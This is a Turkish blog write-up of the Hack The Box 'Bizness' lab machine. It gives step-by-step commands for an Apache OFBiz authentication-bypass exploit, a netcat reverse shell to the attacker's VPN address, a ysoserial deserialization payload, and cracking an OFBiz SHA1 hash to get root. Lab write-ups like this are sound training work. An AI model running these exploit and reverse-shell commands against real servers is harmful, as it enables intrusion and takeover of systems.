Merhabalar bu yazımda Hackthebox Bizness Çözümü sizler için detaylı olarak anlattım. Keyifli çözümler diliyorum..
- Makine Adı: Biznes
- Makine Zorluğu: Kolay
- Makine Oda Linki: Hackthebox Bizness
1- sudo nano /etc/hosts yazıyoruz ve gelen ekrana aşağıda ki gibi ip adresi ve alan adını ekleyerek makineyi ayarlıyoruz.
10.10.11.252 bizness.htb eklemiş olduk.
2- Port taraması yaptım ve 3 portun açık olduğunu tespit ettim. Portları ve versiyonlara göre araştırma yaptım ama bir açık bulamadım.
3- Nikto ile tarama yaptım ve yine net bir bilgi bulamadım. Artık direkt siteye giderek kaynak kodlardan araştırma yapabiliriz.
Gobuster ile de araştırma yaptım oradan da işimize yarar bir şey bulamadım.
4- Kaynak kodlarda bir şey bulamadım ama sayfanın alt kısmında Apache OFBiz olarak kullanıldığını görmüş olduk. Google üzerinden exploit araştırması yapmaya başlayalım.
5- Sırasıyla;
- git clone https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass.git
- cd Apache-OFBiz-Authentication-Bypass
- python3 exploit.py –url https://bizness.htb –cmd ‘nc -c bash vpnipadresiniz 9001’
6- ncat -lvnp 9001 olarak dinlemeyi de başlatalım.
İlginizi çekebilecek yazımız: Alman Polisi, Nemesis Market Darkweb Pazarını Kapattı
7- Çalıştırdığımızda Java kodlarında hata olduğu uyarısını aldık. Dosya içerisine girip exploit.py açıyoruz ve size vereceğim kodlar ile değiştirebilirsiniz.
nano ile de değiştirebilirsiniz ya da manuel de ekleyebilirsiniz. Ben manuel olarak el ile düzenleyeceğim.
8- Aşağıda ki kodu command= başlayan kod ile değiştiriyoruz.
command = “java -jar –add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED –add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED –add-opens java.base/java.net=ALL-UNNAMED –add-opens=java.base/java.util=ALL-UNNAMED ysoserial-all.jar CommonsBeanutils1 ‘{args.cmd}'”
Tüm kodları buraya ekledim eğer exploit.py çalışmazsa link içerisindeki kodlar ile exploit.py içerisindekileri değiştirebilirsiniz.
9- 5.maddeki adım ile exploit.py tekrar çalıştırdık ve direkt olarak bağlantımız ekrana geldi.
10- Templates içerisine geldim ve Adminuserlogindata.xml içerisine geldik ve En altta SHA1 tarzında özel kodlanmış bir şifreleme ile karşılaştık. Bunun daha detaylı görmek için log kayıtlarında araştırmaya devam ediyorum.
11- Admin içerisinde ki kayıtı buldum ve SHA1 benzer şifrenin açık halini tespit ettim.
ApacheOfBiz şifrelemesi kendine özel olduğu için sadece özel programlar ile kırabiliyoruz. Yani bu şifreleme türünü kırmak için direkt brute force yapmamız gerekiyor.
12- Sırasıyla;
- git clone https://github.com/duck-sec/Apache-OFBiz-SHA1-Cracker.git
- cd Apache-OFBiz-SHA1-Cracker
- python3 OfBiz-crack.py –hash-string ‘Sha1 şifre’
girdik ve direkt olarak brute force saldırısını yaptı ve şifreyi decode ettik.
Root şifresi monkeybizness olarak tbulduk.
13- su root dedik ve monkeybizness şifresini girerek root olduk.
Sırasıyla, cat /home/ofbiz/user.txt ve cat /root/root.txt direkt olarak root bayrağını da bulduk.
Hackthebox Bizness Çözümü yazımızın sonuna geldik, yeni yazılarda görüşmek üzere sağlıcakla kalın..